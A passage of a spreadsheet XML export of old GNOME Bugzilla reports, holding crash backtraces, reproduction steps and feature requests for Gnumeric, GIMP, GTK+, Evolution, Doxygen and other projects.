#22 0x4001e3bf in dh_base_new_window (base=0x8054788) at dh-base.c:280
#23 0x080496e2 in main (argc=1 argv=0xbfffdeb4) at dh-main.c:284
#24 0x408803ed in __libc_start_main () from /lib/libc.so.6
Thread 1 (Thread 16384 (LWP 13216)):
#0  0x4090de66 in waitpid () from /lib/libc.so.6
No locals.
#1  0x400a6fa7 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  0x40b494e1 in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#3  
No locals.
#4  0x407e7f12 in g_type_check_instance_is_a ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#5  0x407d1eed in g_object_ref () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#6  0x40610dfa in gtk_widget_modify_font () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#7  0x4061037d in gtk_widget_ensure_style () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#8  0x4056deaa in gtk_size_group_remove_widget ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#9  0x4056e25f in _gtk_size_group_compute_requisition ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#10 0x4060cf6c in gtk_widget_size_request () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#11 0x4061cf31 in _gtk_window_unset_focus_and_default ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#12 0x4061b80b in gtk_window_reshow_with_initial_size ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#13 0x407dfd77 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0x407cd247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0x407cced7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0x407df20f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#17 0x407de9a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0x407debe4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0x4060bea8 in gtk_widget_show () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#20 0x404cbff3 in gtk_container_get_focus_hadjustment ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#21 0x4060c326 in gtk_widget_show_all () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#22 0x4001e3bf in dh_base_new_window (base=0x8054788) at dh-base.c:280
	priv = (struct _DhBasePriv *) 0x8071050
	window = (struct _GtkWidget *) 0x1
#23 0x080496e2 in main (argc=1 argv=0xbfffdeb4) at dh-main.c:284
	base = (struct _DhBase *) 0xfffffe00
	window = (struct _GtkWidget *) 0x40988990
	option_search = (gchar *) 0x0
	option_quit = 0
	fd = -1
	options = {{longName = 0x804986a search shortName = 115 's' 
    argInfo = 1 arg = 0xbfffdd7c val = 0 
    descrip = 0x8049854 Search for a function argDescrip = 0x0} {
    longName = 0x804988a quit shortName = 113 'q' argInfo = 0 
    arg = 0xbfffdd78 val = 0 descrip = 0x8049871 Quit any running
Devhelp 
    argDescrip = 0x0} {longName = 0x0 shortName = 0 '\0' argInfo = 0
    arg = 0x0 val = 0 descrip = 0x0 argDescrip = 0x0}}
#24 0x408803ed in __libc_start_main () from /lib/libc.so.6
No symbol table info available.
#0  0x4090de66 in waitpid () from /lib/libc.so.6
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-04-03 11:06 -------
The original reporter (yohba@free.fr) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component micke@codefactory.se.
</t>
  </si>
  <si>
    <t>yohba</t>
  </si>
  <si>
    <t>GNUMERIC-361436</t>
  </si>
  <si>
    <t>Out of memory error when opening large file</t>
  </si>
  <si>
    <t>opening a particular file created in gnumeric 1.6.3 gives me a memory errors (after about 15 min of waiting) similar to:
Glib-ERROR **:gmem.c:135:failed to allocate xxxxx bytes
aborting...
then gnumeric closes itself
this happened in 1.6.3 so I tried 1.7.1 with the same result
does this mean my file is corrupt? or my computer is too small to handle it?
I can provide the file upon request (12MB)
my computer:
        Windows XP Professional Service Pack 2 (build 2600)
        2.07 gigahertz AMD Athlon XP
        128 kilobyte primary memory cache
        256 kilobyte secondary memory cache
 	1024 Megabytes Installed Memory
        c: (FAT32 on drive 0) 	40.01 GB 	20.68 GB free
also I notice gnumeric files of significant size take a very long time to load. is something wrong or is this just how it is?</t>
  </si>
  <si>
    <t>kr4z33</t>
  </si>
  <si>
    <t>GSTREAMER-581546</t>
  </si>
  <si>
    <t>gst-python</t>
  </si>
  <si>
    <t>Elements do_query function is broken</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Create a new source element inherited from gst.BaseSrc
2. Implement source's query method
3. Try to use it
Stack trace:
This warning are repeated on every query:
(PlayerGST2.py:15688): GStreamer-CRITICAL **: gst_query_get_structure: assertion `GST_IS_QUERY (query)' failed
(PlayerGST2.py:15688): GStreamer-CRITICAL **: gst_structure_id_get_value: assertion `structure != NULL' failed
sys:1: Warning: g_value_get_boolean: assertion `G_VALUE_HOLDS_BOOLEAN (value)' failed                         
(PlayerGST2.py:15688): GStreamer-CRITICAL **: gst_structure_id_get_value: assertion `structure != NULL' failed
sys:1: Warning: g_value_get_uint64: assertion `G_VALUE_HOLDS_UINT64 (value)' failed                           
(PlayerGST2.py:15688): GStreamer-CRITICAL **: gst_structure_id_get_value: assertion `structure != NULL' failed
sys:1: Warning: invalid unclassed pointer in cast to `GstMiniObject'                                          
(PlayerGST2.py:15688): GStreamer-CRITICAL **: gst_mini_object_unref: assertion `mini_object-&gt;refcount &gt; 0' failed
(PlayerGST2.py:15688): GStreamer-CRITICAL **: gst_query_get_structure: assertion `GST_IS_QUERY (query)' failed
(PlayerGST2.py:15688): GStreamer-CRITICAL **: gst_structure_id_get_value: assertion `structure != NULL' failed
PlayerGST2.py:125: Warning: g_value_get_int64: assertion `G_VALUE_HOLDS_INT64 (value)' failed                 
Other information:
Everything is ok with gstreamer-python 0.10.13</t>
  </si>
  <si>
    <t>a2k0001</t>
  </si>
  <si>
    <t>EVOLUTION-256897</t>
  </si>
  <si>
    <t>`Problem in saving phone numbers of a contact in addressbook.</t>
  </si>
  <si>
    <t>Description of Problem:
I am using evolution1.5.6 When I was entering a contact details to my
addressbook I tried to enter the company phone number(which I selected from
popdown menu) after that I tried to enter the business phone number but its
already taken the first digit of the company phone number. The same thing
is repeating with business phone number 2. It is taking first two digits
from company phone number and it is saving it. If I want to enter the
business phone1 and 2 I have to delete these digits and then I have to save it.
Steps to reproduce the problem:
1. Go to contacts.
2. Start to add new contact using contact editor. Enter the name 
   jobtittle organization and when your entering the phone details on 
   first option you select company phone and enter the number.
3. Then if you are trying to enter the business phone and business phone2
   their you will find the first one digit and two digit of the company 
   phone number. 
4. If youn are saving the contact information on any addressbook without 
   entering anything for business phone numbers it will store with first 
   two digits of company phone number.
Actual Results:
It will store the first two digits of the company number for business phone
and business phone 2.
Expected Results:
It should not store those digits from any other phone (HERE COMPANY PHONE).
How often does this happen? 
Every time.
Additional Information:</t>
  </si>
  <si>
    <t>evolution-addressbook-maintainers</t>
  </si>
  <si>
    <t>ckumar</t>
  </si>
  <si>
    <t>GIMP-326651</t>
  </si>
  <si>
    <t>User Interface</t>
  </si>
  <si>
    <t>gimp-2.3.x crash when accessing preferences</t>
  </si>
  <si>
    <t>Gimp 2.3.6 and some previous versions crash when accessing preferences by menu file=&gt;preferences.
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 1024 (LWP 3493)]
0xb7d06be1 in gtk_tree_model_filter_convert_iter_to_child_iter ()
   from /usr/lib/libgtk-x11-2.0.so.0
(gdb) bt
#0  0xb7d06be1 in gtk_tree_model_filter_convert_iter_to_child_iter ()
   from /usr/lib/libgtk-x11-2.0.so.0
#1  0xb7d08384 in gtk_tree_model_filter_clear_cache ()
   from /usr/lib/libgtk-x11-2.0.so.0
#2  0xb7d055a8 in gtk_tree_model_get_value () from /usr/lib/libgtk-x11-2.0.so.0
#3  0xb7d05abd in gtk_tree_model_get_valist ()
   from /usr/lib/libgtk-x11-2.0.so.0
#4  0xb7d05c4f in gtk_tree_model_get () from /usr/lib/libgtk-x11-2.0.so.0
#5  0xb7c16376 in gtk_file_chooser_button_get_type ()
   from /usr/lib/libgtk-x11-2.0.so.0
#6  0xb7c178e7 in gtk_file_chooser_button_set_width_chars ()
   from /usr/lib/libgtk-x11-2.0.so.0
#7  0xb78f4219 in g_object_set_valist () from /usr/lib/libgobject-2.0.so.0
#8  0xb78f458f in g_object_set () from /usr/lib/libgobject-2.0.so.0
#9  0xb7c15ea1 in gtk_file_chooser_button_get_type ()
   from /usr/lib/libgtk-x11-2.0.so.0
#10 0xb78f122f in g_object_newv () from /usr/lib/libgobject-2.0.so.0
#11 0xb78f1c89 in g_object_new_valist () from /usr/lib/libgobject-2.0.so.0
#12 0xb78f1e8b in g_object_new () from /usr/lib/libgobject-2.0.so.0
#13 0xb7c17660 in gtk_file_chooser_button_new ()
   from /usr/lib/libgtk-x11-2.0.so.0
#14 0xb7e6a3cd in gimp_prop_file_chooser_button_new ()
   from /mnt/hda3/softs/gimp-2.3.6/bin/../lib/libgimpwidgets-2.0.so.0
#15 0x0809b401 in gtk_widget_grab_focus ()
#16 0x08138e99 in gtk_widget_grab_focus ()
#17 0x0807012c in gtk_widget_grab_focus ()
#18 0xb7905c85 in g_cclosure_marshal_VOID__STRING ()
   from /usr/lib/libgobject-2.0.so.0
#19 0xb78eebdb in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#20 0xb7903e08 in g_signal_has_handler_pending ()
   from /usr/lib/libgobject-2.0.so.0
#21 0xb7904d6a in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#22 0xb7905056 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#23 0x08169d27 in gtk_widget_grab_focus ()
#24 0x08169d99 in gtk_widget_grab_focus ()
#25 0xb7905448 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#26 0xb78eef19 in g_cclosure_new_swap () from /usr/lib/libgobject-2.0.so.0
#27 0xb78eebdb in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#28 0xb7903707 in g_signal_has_handler_pending ()
   from /usr/lib/libgobject-2.0.so.0
#29 0xb7904d6a in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#30 0xb7905056 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#31 0xb7bb1cf3 in gtk_action_create_menu_item ()
   from /usr/lib/libgtk-x11-2.0.so.0
#32 0xb7bb1ea8 in gtk_action_activate () from /usr/lib/libgtk-x11-2.0.so.0
#33 0xb7905448 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#34 0xb78eebdb in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#35 0xb7903e08 in g_signal_has_handler_pending ()
   from /usr/lib/libgobject-2.0.so.0
#36 0xb7904d6a in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#37 0xb7905056 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#38 0xb7d3585a in gtk_widget_activate () from /usr/lib/libgtk-x11-2.0.so.0
#39 0xb7c7a4a2 in gtk_menu_shell_activate_item ()
   from /usr/lib/libgtk-x11-2.0.so.0
#40 0xb7c7a68f in gtk_menu_shell_activate_item ()
   from /usr/lib/libgtk-x11-2.0.so.0
#41 0xb7c71a09 in gtk_menu_reorder_child () from /usr/lib/libgtk-x11-2.0.so.0
#42 0xb7c6ce20 in gtk_marshal_VOID__UINT_STRING ()
   from /usr/lib/libgtk-x11-2.0.so.0
#43 0xb78eef19 in g_cclosure_new_swap () from /usr/lib/libgobject-2.0.so.0
#44 0xb78eebdb in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#45 0xb790397b in g_signal_has_handler_pending ()
   from /usr/lib/libgobject-2.0.so.0
#46 0xb7904ab3 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#47 0xb7905056 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#48 0xb7d359e4 in gtk_widget_activate () from /usr/lib/libgtk-x11-2.0.so.0
#49 0xb7c6a978 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
#50 0xb7c6adb0 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
#51 0xb781b0e1 in gdk_event_get_graphics_expose ()
   from /usr/lib/libgdk-x11-2.0.so.0
#52 0xb7887f07 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#53 0xb78898be in g_main_context_acquire () from /usr/lib/libglib-2.0.so.0
#54 0xb7889bea in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#55 0x08065953 in gtk_widget_grab_focus ()
#56 0x08066162 in gtk_widget_grab_focus ()
#57 0xb795a532 in __libc_start_main (
    main=0x8065e10  argc=1 ubp_av=0x0 
    init=0x805ece8  fini=0x8065b20  
    rtld_fini=0x8c59310 stack_end=0x0) at ../sysdeps/generic/libc-start.c:129</t>
  </si>
  <si>
    <t>JHBUILD-136983</t>
  </si>
  <si>
    <t>should set PYTHONPATH</t>
  </si>
  <si>
    <t>When trying to build gnome-blog-poster I discovered that I needed to set
PYTHONPATH to point at buildprefix/lib/python2.2/site-packages/. It would
be nice if this were set by jhbuild.
Thanks James.</t>
  </si>
  <si>
    <t>luis</t>
  </si>
  <si>
    <t>PAN-119783</t>
  </si>
  <si>
    <t>Error message appearing in log file no obvious reason found</t>
  </si>
  <si>
    <t>The following message is appearing in the log window quite frequently but
there is no obvious reason why nor any effect that is apparent to me.
Gtk - file gtktogglebutton.c: line 325 (gtk_toggle_button_get_active): 
assertion `GTK_IS_TOGGLE_BUTTON (toggle_button)' failed
Please advise if it is an important error or not:</t>
  </si>
  <si>
    <t>bdm</t>
  </si>
  <si>
    <t>GNUMERIC-57486</t>
  </si>
  <si>
    <t>Sheet Objects</t>
  </si>
  <si>
    <t>Creating a sheetobject crashes</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnumeric
Severity: grave
Version:  0.61
Synopsis: Gnumeric crash down after sheet-change  with autoformat function 
Class:    sw-bug
Distribution: Linux/PPC 2000 Q4
System: Linux 2.2.18 ppc unknown
C library: glibc-2.1.3-4a
C compiler: 2.95.3
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.6
gnome-libs: gnome-libs 1.2.11
libxml: 1.8.10
gnome-print: gnome-print-0.25-0_helix_1
gnome-core: gnome-core 1.2.4
Description:
Select a sheet an some rows --&gt; Autoformat --&gt; Crash!
Debugging information:
0xf3d4460 in wait4 () at soinit.c:59
#0  0xf3d4460 in wait4 () at soinit.c:59
#1  0xf3d4414 in __libc_waitpid (pid=512 stat_loc=0x7fffef68 options=0)
    at ../sysdeps/unix/sysv/linux/waitpid.c:26
#2  0xfcc41fc in gnome_segv_handle (signum=11) at gnome-init.c:660
#3  
#4  sheet_col_get_info (sheet=0x0 col=0) at sheet.c:547
#5  0x100873d4 in cell_offset_calc_pixel (sheet=0x0 i=0 is_col=1 
    anchor_type=SO_ANCHOR_UNKNOWN offset=0) at sheet-object.c:453
#6  0x10087544 in sheet_object_position_pixels (so=0x10354db0 scg=0x102a6d30 
    coords=0x7ffff308) at sheet-object.c:485
#7  0x100942e0 in scg_object_view_position (scg=0x102a6d30 so=0x0 
    coords=0x7ffff338) at sheet-control-gui.c:1711
#8  0x1005b238 in cb_obj_create_button_release (gsheet=0x102edfb0 
    event=0x102aef90 closure=0x1032e308) at item-grid.c:678
#9  0xf831b2c in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#10 0xf86daec in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#11 0xf86cb58 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#12 0xf86a1a0 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#13 0xf8ae8a8 in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#14 0xf831a60 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#15 0xf8306e8 in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#16 0xf711980 in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#17 0xf698c84 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#18 0xf6992f0 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#19 0xf699534 in g_main_run () from /usr/lib/libglib-1.2.so.0
#20 0xf82feb0 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#21 0x1001bf50 in gnumeric_main (closure=0x0 argc=270504760 argv=0x101a0000)
    at main.c:247
#22 0x1001bfbc in main (argc=0 argv=0x1) at main.c:315
#23 0xf36f734 in __libc_start_main (argc=5 argv=0x7ffff9c4 envp=0x7ffff9dc 
    auxvec=0x7ffffa5c rtld_fini=0 stinfo=0x10125310 
    stack_on_entry=0x40000000) at ../sysdeps/powerpc/elf/libc-start.c:106
#0  0xf3d4460 in wait4 () at soinit.c:59
59	in soinit.c
__CTOR_LIST__ = {0xffffffff}
__DTOR_LIST__ = {0xffffffff}
__EH_FRAME_BEGIN__ = 0xf44bfc0 
#1  0xf3d4414 in __libc_waitpid (pid=512 stat_loc=0x7fffef68 options=0)
    at ../sysdeps/unix/sysv/linux/waitpid.c:26
No locals.
#2  0xfcc41fc in gnome_segv_handle (signum=11) at gnome-init.c:660
estatus = 261119752
in_segv = 1
pid = 512
#3  
No symbol table info available.
#4  sheet_col_get_info (sheet=0x0 col=0) at sheet.c:547
ci = (ColRowInfo *) 0x0
segment = (ColRowSegment *) 0x0
#5  0x100873d4 in cell_offset_calc_pixel (sheet=0x0 i=0 is_col=1 
    anchor_type=SO_ANCHOR_UNKNOWN offset=0) at sheet-object.c:453
cri = (ColRowInfo *) 0x0
#6  0x10087544 in sheet_object_position_pixels (so=0x10354db0 scg=0x102a6d30 
    coords=0x7ffff308) at sheet-object.c:485
485	in sheet-object.c
No locals.
#7  0x100942e0 in scg_object_view_position (scg=0x102a6d30 so=0x0 
    coords=0x7ffff338) at sheet-control-gui.c:1711
pixels = {0 0 55 16}
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-07-13 08:25 -------
The original reporter (jdf@procube.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jgoldberg@home.com.
</t>
  </si>
  <si>
    <t>jdf</t>
  </si>
  <si>
    <t>GTKMM-330945</t>
  </si>
  <si>
    <t>IconTheme::list_icons</t>
  </si>
  <si>
    <t>Documentation for IconTheme::list_icons says:
context  A string identifying a particular type of icon or 0 to list all icons.
The argument is of type Glib::ustring&amp; so it's not possible to pass NULL.
Some mechanism should be provided to access the list everything functionality.</t>
  </si>
  <si>
    <t>PLANNER-344793</t>
  </si>
  <si>
    <t>PLANNER</t>
  </si>
  <si>
    <t>missing files in po/POTFILES.in</t>
  </si>
  <si>
    <t>intltool-update -m    reports these files as missing:
data/planner.desktop.in
eds-backend/e-cal-backend-planner.c
eds-backend/planner-source/planner-source.c</t>
  </si>
  <si>
    <t>planner-maint</t>
  </si>
  <si>
    <t>EPIPHANY-337852</t>
  </si>
  <si>
    <t>side mouse button to go backwards</t>
  </si>
  <si>
    <t>the side mouse button should go 'back'.
this is button 8 on my (fairly typical) mouse on ubuntu dapper with default config.</t>
  </si>
  <si>
    <t>PANGO-143436</t>
  </si>
  <si>
    <t>file break.c: line 728 (pango_default_break): assertion failed: (IN_BREAK_TABLE (break_type))</t>
  </si>
  <si>
    <t>On linux/ppc (fedora core 2 based) use gedit to open a C# source file from
MonoDevelop and watch gedit crash:
(gdb) r UseExistingGenerator.cs
Starting program: /home/jeroen/built/bin/gedit UseExistingGenerator.cs
[Thread debugging using libthread_db enabled]
[New Thread 805540352 (LWP 25078)]
** ERROR **: file break.c: line 728 (pango_default_break): assertion failed:
(IN_BREAK_TABLE (break_type))
aborting...
Program received signal SIGABRT Aborted.
[Switching to Thread 805540352 (LWP 25078)]
0x0e4121b8 in raise () from /lib/tls/libc.so.6
(gdb)
This is 100% reproducable. I've had similar crashes with certain mails in
evolution. Attaching backtrace in a bit.</t>
  </si>
  <si>
    <t>jeroen.zwartepoorte</t>
  </si>
  <si>
    <t>GUCHARMAP-130550</t>
  </si>
  <si>
    <t>GUCHARMAP</t>
  </si>
  <si>
    <t>[UI-REVIEW] Remove the `Search -&gt; Character in Clipboard' menu item</t>
  </si>
  <si>
    <t>I think that the `Search -&gt; Character in Clipboard' menu item is both
confusing and not really useful and should therefore be removed.
If people want to search for a character in the clipboard they can just
search it using the normal find dialog I think.
It's true that once you got the idea using a separate menu entry to
search a character on the clipboard is slightly more convenient.  However
I don't think searching characters on the clipboard is really that
common--after all if you have the character already on the clipboard you
wouldn't need to search it if you wanted to paste it into a document (the
main use of gucharmap I think).  Therefore the increased usability of the
menu is well worth the removal of this item in my opinion.</t>
  </si>
  <si>
    <t>GTKMM-311290</t>
  </si>
  <si>
    <t>reference documentation</t>
  </si>
  <si>
    <t>Link to API Reference in the tutorial section on Gtk::Combo is incorrect</t>
  </si>
  <si>
    <t>Documentation bug
Section: 
The link labeled 'Reference' in the tutorial section on Gtk::Combo
(http://gtkmm.org/docs/gtkmm-2.4/docs/tutorial/html/ch06s03.html) actually goes
to the API reference for a radiobutton.  
Correct version:
Other information:</t>
  </si>
  <si>
    <t>EVOLUTION-257288</t>
  </si>
  <si>
    <t>poorly worded message for failed signature verification due to missing key</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
If a PGP signed message arrives for which the recipient doesn't have the
public key required to verify the signature the message displays:
Valid signature cannot verify sender
Additionally the image - though different from the valid signature image
doesn't immediately suggest a bad signature.</t>
  </si>
  <si>
    <t>GTHUMB-159661</t>
  </si>
  <si>
    <t>Symlinks in the root directory are incorrectly resolved</t>
  </si>
  <si>
    <t>Create a path from / with a relative symlink in it.
For example:
cd /
mkdir -p a/b/c
ln -s a/b .
cd a
ln -s b/c .
Now place any picutre in /a/b/c and navigate through it with gthumb. Although
/a/b/c and /a/c will display thumbnails correctly /b/c will not (the holding
images are never replaced).
This is a real problem for me since on my machine /home is a link to
usr/local/home meaning I unable to see any thumbnails in my home directory (and
for the same reason the comments for my images have been orphaned).</t>
  </si>
  <si>
    <t>gnome-2015</t>
  </si>
  <si>
    <t>GIMP-107949</t>
  </si>
  <si>
    <t>modifications to the selection are not noticed</t>
  </si>
  <si>
    <t>It looks like the selection is not updated when you 
directly write to the selection channel. 
My code contained the following steps: 
* Create a new image 
* Get the drawable for the selection channel with 
  gimp_drawable_get(gimp_image_get_selection(image_id)) 
* Modify the drawable 
The GIMP always tells me that there is no selection 
on the image. 
The problem appears to be that gimp_image_mask_changed is not 
called when the channel is modified directly. 
I can imagine that it could both too expensive and 
complicated to call gimp_image_mask_changed after 
every modification of the channel but it seems desirable 
that there would be an official API to notify the GIMP 
that the selection mask was modified. 
I solved the problem by calling 
gimp_selection_load(gimp_image_get_selection(image_id)). 
This solution works but is not very efficient because 
it actually copies the entire channel onto itself. 
I think that the most pragmatic solution would be to 
add a pdb interface to gimp_image_mask_changed.</t>
  </si>
  <si>
    <t>ernstl</t>
  </si>
  <si>
    <t>GTK+-88627</t>
  </si>
  <si>
    <t>GtkButtonBox doen't honor pack_end</t>
  </si>
  <si>
    <t>may not really be a bug but there appears to be an annoying inconsistency
between gtk 1.2 and gtk 2.0.  a short semi-code example might be easiest to
describe this:
dlg = gtk_dialog_new()
gtk_box_set_homogeneous(GTK_BOX(GTK_DIALOG(dlg)-&gt;action_area) FALSE)
ok_button = gtk_button_new(Ok)
cancel_button = gtk_button_new(Cancel)
gtk_box_pack_end(GTK_BOX(GTK_DIALOG(dlg)-&gt;action_area) ok_button FALSE
FALSE 0)
gtk_box_pack_end(GTK_BOX(GTK_DIALOG(dlg)-&gt;action_area) cancel_button
FALSE FALSE 0)
ok in gtk-1.2 this results in a dialog with the buttons right-justified
with the Ok button on the RIGHT and the Cancel button on the LEFT.  in
gtk-2.0 this is reversed the Ok button is on the LEFT and the Cancel
button is on the RIGHT.
now this _only_ occurrs when using GtkDialog.  when using a GtkWindow
packing a GtkHBox into it and packing the buttons into the GtkHBox the
behaviour is identical in both 1.2 and 2.0 (the desired behaviour of having
the ok button on the right and cancel button on the left).
one final thing- i'm setting GTK_CAN_DEFAULT on the buttons and am using
gtk_widget_grab_default() on the Ok button - could this have anything to do
with it?
is there something i'm missing here?  i've looked thru as much
documentation as i can and i don't _think_ there should be a difference in
how the buttons are laid out but i could be wrong of course...</t>
  </si>
  <si>
    <t>bjt23</t>
  </si>
  <si>
    <t>DOXYGEN-303305</t>
  </si>
  <si>
    <t>\subpage does not work as advertised</t>
  </si>
  <si>
    <t>Version details: 1.4.2
using the \subpage command in doxygen 1.4.2 has no effect except for inserting a
link. It does not create a subpage structure in the TREE_VIEW nor in latex
(pdf). Example: Create three files:
a.dox:
/*! \page page1 Page 1
the top page
\subpage page2 A Subpage
*/
b.dox:
/*! \page page2 Page 2
this is a subpage.
*/
Doxyfile:
INPUT = a.dox b.dox
GENERATE_TREEVIEW = YES
If you run doxygen you will get the same output whether you use the subpage
command in a.dox or replace it with 
      \ref page2 A Subpage 
with the exception that the second page (the subpage) has a reference to the
first page in its header. The latex output is exatly the same though. Neither
the tree view nor the table of contents is different (nor does it change the
order in which pages are listed i.e. subpages are not moved so that they appear
after their top page).</t>
  </si>
  <si>
    <t>GTK+-96630</t>
  </si>
  <si>
    <t>Support RTL flipping for notebooks</t>
  </si>
  <si>
    <t>the tab order should be inverted in RTL mode.</t>
  </si>
  <si>
    <t>DOXYGEN-496392</t>
  </si>
  <si>
    <t xml:space="preserve"> even when they're part of a special character sequence</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #351905 +++
+++ http://bugzilla.gnome.org/show_bug.cgi?id=351905. +++
Hello
I have found a similar problem for version 1.5.x.
When special commands like \section \subsection \subsubsection or \code (comment) include HTML accent entity codes ( for example) the character .
I work with Doxygen 1.5.3 but I reproduced the problem using the 2007-11-03 Linux build.
For this dummy example I ran doxygen -g I added dox.h to the Doxyfile and I ran doxygen Doxyfile.
// dox.h
/**
 * @section devel 
 *
 * 
 *
 * @code
 * // 
 * @endcode
 *
 */
void dox (void)
becomes
eacute
 // ocirc
Thank you in advance</t>
  </si>
  <si>
    <t>j.bedouet</t>
  </si>
  <si>
    <t>TOTEM-516236</t>
  </si>
  <si>
    <t>YouTube plugin</t>
  </si>
  <si>
    <t>searching in youtube use a huge quantity of CPU</t>
  </si>
  <si>
    <t>This bug has been reported here:
https://bugs.launchpad.net/ubuntu/+source/totem/+bug/190157
always reproducible these are the steps:
1) install python-gdata
2) enable youtube plugin
3) try to search for something.
4) you will see your CPU goes to 50% until results are fetched!
moreover: if there are no results the CPU is used until you close totem (and you can't search for other things)
try to search for calopsitte kill bill which should return no results and cpu goes to 100%
totem version is: 2.21.92
Thanks</t>
  </si>
  <si>
    <t>GSTREAMER-337548</t>
  </si>
  <si>
    <t>gst-plugins-base</t>
  </si>
  <si>
    <t>Memory leaks in basertpdepayload</t>
  </si>
  <si>
    <t>This patch will unref buffers that could still be in queue
and
also unref the input buffer in gst_base_rtp_depayload_push
even if there's no out_buf returned since some plugins like h263depay will copy and add the buffer to an adapter and returnnull as output buffer (in the process function) thus leaking the input buffer... this can be a major leak</t>
  </si>
  <si>
    <t>hexa00</t>
  </si>
  <si>
    <t>EVOLUTION-205356</t>
  </si>
  <si>
    <t>IMAP: Can only see folders from INBOX down not other root folders.</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.11.99
Synopsis: IMAP: Can only see folders from INBOX down not other root folders.
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Recent evolution from red-carpet (v0.11.99):
[rossg@durban rossg]$ telnet imap.golder.org imap
Trying 195.112.17.6...
Connected to rossg.dial.nildram.co.uk (195.112.17.6).
Escape character is '^]'.
* OK skunk.golder.org Cyrus IMAP4 v2.0.9 server ready
0 login rossg youknow
0 OK User logged in
0 list  *
* LIST () . INBOX
* LIST () . INBOX.Admin
* LIST () . INBOX.Admin.Domain
* LIST () . INBOX.Family
* LIST () . INBOX.Friends
* LIST () . INBOX.Trash
* LIST () . Family
* LIST () . Humour
0 OK Completed
However in evolution despite having the 'show only subscribed folders' and 'override namespace' off I do not see Family and Humour only those that are subfolders of INBOX.
The trace of the equivalent evolution IMAP query :
A00001 OK User logged in
A00002 NAMESPACE
* NAMESPACE ((INBOX. .)) ((user. .)) (( .))
A00002 OK Completed
A00003 LIST  {6+}
INBOX.
A00003 OK Completed
A00004 LIST  {7+}
INBOX.*
* LIST () . INBOX.Admin
* LIST () . INBOX.Admin.Domain
* LIST () . INBOX.Ambitions
* LIST () . INBOX.Family
* LIST () . INBOX.Friends
* LIST () . INBOX.Trash
A00004 OK Completed
A00005 STATUS {11+}
INBOX.Admin (UNSEEN)
* STATUS INBOX.Admin (UNSEEN 0)
A00005 OK Completed
A00006 STATUS {18+}
INBOX.Admin.Domain (UNSEEN)
* STATUS INBOX.Admin.Domain (UNSEEN 0)
A00006 OK Completed
A00007 STATUS {20+}
INBOX.Admin.Licenses (UNSEEN)
* STATUS INBOX.Admin.Licenses (UNSEEN 0)
...
A00096 NOOP
A00096 OK Completed
A00097 LOGOUT
* BYE LOGOUT received
A00097 OK Completed
